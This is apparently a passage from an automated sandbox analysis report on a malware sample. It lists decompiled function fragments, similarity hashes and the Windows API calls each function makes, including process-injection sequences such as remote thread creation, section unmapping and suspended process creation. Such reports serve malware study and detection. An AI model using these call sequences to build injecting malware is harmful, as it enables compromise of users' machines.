								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
